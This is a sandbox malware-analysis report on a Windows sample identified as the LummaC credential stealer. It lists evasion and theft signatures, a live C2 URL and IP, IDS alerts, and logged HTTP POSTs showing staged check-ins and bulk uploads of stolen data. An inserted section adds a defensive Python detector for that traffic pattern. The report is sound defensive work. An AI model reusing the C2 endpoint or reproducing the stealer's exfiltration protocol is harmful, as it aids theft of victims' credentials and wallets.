Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561861
MD5: 5e1ee83df7fd0f85791575eed5abffa8
SHA1: f08345571a764d0c1837951c26b75757f3328005
SHA256: 15b5aa1fbb4d831060a3276e5ea6119ddc6a5228371dd99bd40c98d9e4937ad2
Tags: exe, user-Bitsight

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process tree:

  • System is w10x64
  • file.exe (PID: 7472, cmdline: "C:\Users\user\Desktop\file.exe", MD5: 5E1EE83DF7FD0F85791575EED5ABFFA8)
  • cleanup

Malware configuration (LummaC, extracted from the memory of PID 7472):

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Yara matches:

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

Sigma matches: No Sigma rule has matched

Suricata alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T14:56:18.868806+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:20.867552+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:23.201819+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49704 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:25.561861+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:28.430843+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49716 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:30.795353+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49722 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:33.237543+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49728 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:37.184361+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49743 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:19.547647+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:21.572038+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:19.547647+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:21.572038+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:24.205397+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:33.242954+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.7 | 49728 | 172.67.162.84 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.7472.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 0_2_00BB98F0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 0_2_00BEB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_00BEB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 0_2_00BBE0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 0_2_00BBE35B

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49704 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49728 -> 172.67.162.84:443
Source: Malware configuration extractor | URLs: https://property-imper.sbs/api
Source: Joe Sandbox View | IP Address: 172.67.162.84
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49743 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 172.67.162.84:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PXS8L39KKN0OTL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12826
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XOWQ8R70FVEH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15046
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0K8HMKZ6QXJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20365
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=BI31JNVD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1183
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=HO9HQRQFY2M9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 550291
    Host: property-imper.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: file.exe, 00000000.00000003.1441202945.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497536096.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502091584.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499118729.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497785054.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1498844199.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497801753.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiD
Source: file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apib
Source: file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apif
Source: file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs:443/api
Source: file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs:443/apil
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49728 version: TLS 1.2
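The POSTs to /api above follow a staged shape: short application/x-www-form-urlencoded check-ins (8 and 53 bytes) to the C2 path, then multipart/form-data uploads of roughly 1 KB to 550 KB to the same host within seconds, all carrying a Chrome User-Agent. The detector below is an added example and not part of the Joe Sandbox report; it turns that sequence into an alert over a constructed proxy log. The log format (timestamp, source, method, host, path, content type, content length), the thresholds, and the three benign lines are assumptions; the host, path, timestamps and Content-Length values in the first seven lines are taken from the report, with each POST paired to a connection timestamp in the order the report lists them (that pairing is itself an assumption).

```python
"""Detect the staged check-in / upload sequence seen in the report's HTTP traffic:
short application/x-www-form-urlencoded POSTs to a path, then multipart/form-data
POSTs to the same host and path within seconds. Standard library only."""
import re
from datetime import datetime

# Constructed proxy-log lines: host, path, timestamps and Content-Lengths come from
# the report's evidence; the log format and the last three lines are assumed.
SAMPLE_LOG = """\
2024-11-24T14:56:18 192.168.2.7 POST property-imper.sbs /api "application/x-www-form-urlencoded" 8
2024-11-24T14:56:20 192.168.2.7 POST property-imper.sbs /api "application/x-www-form-urlencoded" 53
2024-11-24T14:56:23 192.168.2.7 POST property-imper.sbs /api "multipart/form-data; boundary=PXS8L39KKN0OTL" 12826
2024-11-24T14:56:25 192.168.2.7 POST property-imper.sbs /api "multipart/form-data; boundary=XOWQ8R70FVEH" 15046
2024-11-24T14:56:28 192.168.2.7 POST property-imper.sbs /api "multipart/form-data; boundary=0K8HMKZ6QXJ" 20365
2024-11-24T14:56:30 192.168.2.7 POST property-imper.sbs /api "multipart/form-data; boundary=BI31JNVD" 1183
2024-11-24T14:56:33 192.168.2.7 POST property-imper.sbs /api "multipart/form-data; boundary=HO9HQRQFY2M9" 550291
2024-11-24T14:57:05 192.168.2.9 POST intranet.example /upload "multipart/form-data; boundary=a1b2c3" 250000
2024-11-24T14:57:40 192.168.2.9 POST sso.example /login "application/x-www-form-urlencoded" 53
2024-11-24T14:57:41 192.168.2.7 GET www.example.com /index.html "" 0
"""

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) '
                    r'(?P<path>\S+) "(?P<ctype>[^"]*)" (?P<length>\d+)$')


def parse_log(text: str) -> list:
    """Parse log lines into dicts (malformed lines are dropped), sorted by time."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            r = m.groupdict()
            r["ts"] = datetime.fromisoformat(r["ts"])
            r["length"] = int(r["length"])
            rows.append(r)
    return sorted(rows, key=lambda r: r["ts"])


def find_staged_exfil(rows: list, max_checkin: int = 64, min_total: int = 16384,
                      window: int = 60) -> list:
    """One alert per (src, host, path) where a form-urlencoded POST of at most
    `max_checkin` bytes is followed within `window` seconds by multipart POSTs
    totalling at least `min_total` bytes. A multipart upload with no prior
    check-in (an ordinary browser form upload) never fires."""
    state = {}
    for r in rows:
        if r["method"] != "POST":
            continue
        s = state.setdefault((r["src"], r["host"], r["path"]),
                             {"checkins": 0, "uploads": 0, "bytes": 0, "last_checkin": None})
        ctype = r["ctype"].split(";")[0].strip().lower()   # drop the boundary parameter
        if ctype == "application/x-www-form-urlencoded" and r["length"] <= max_checkin:
            s["checkins"] += 1
            s["last_checkin"] = r["ts"]
        elif (ctype == "multipart/form-data" and s["last_checkin"] is not None
              and (r["ts"] - s["last_checkin"]).total_seconds() <= window):
            s["uploads"] += 1
            s["bytes"] += r["length"]
    return [dict(src=k[0], host=k[1], path=k[2], checkins=s["checkins"],
                 uploads=s["uploads"], bytes=s["bytes"])
            for k, s in state.items() if s["uploads"] and s["bytes"] >= min_total]
```

Run against the constructed log, `find_staged_exfil(parse_log(SAMPLE_LOG))` returns a single alert for 192.168.2.7 to property-imper.sbs/api with 2 check-ins and 5 uploads totalling 599711 bytes; the standalone intranet upload and the lone login POST do not fire. The window matters: the pattern is the tight coupling of a tiny check-in and bulk uploads, not either request on its own.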

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01574C07 (3 identical entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01574CC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_015640D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01574C07 (9 identical entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB98F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BBE0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB89A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF0C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF1580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC9530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01574C07
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: (blank) ZLIB complexity 0.999250768442623
Source: file.exe | Static PE information: Section: mbsuitke ZLIB complexity 0.9943489819431852
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1344317173.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1344093780.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1368622534.0000000005D00000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
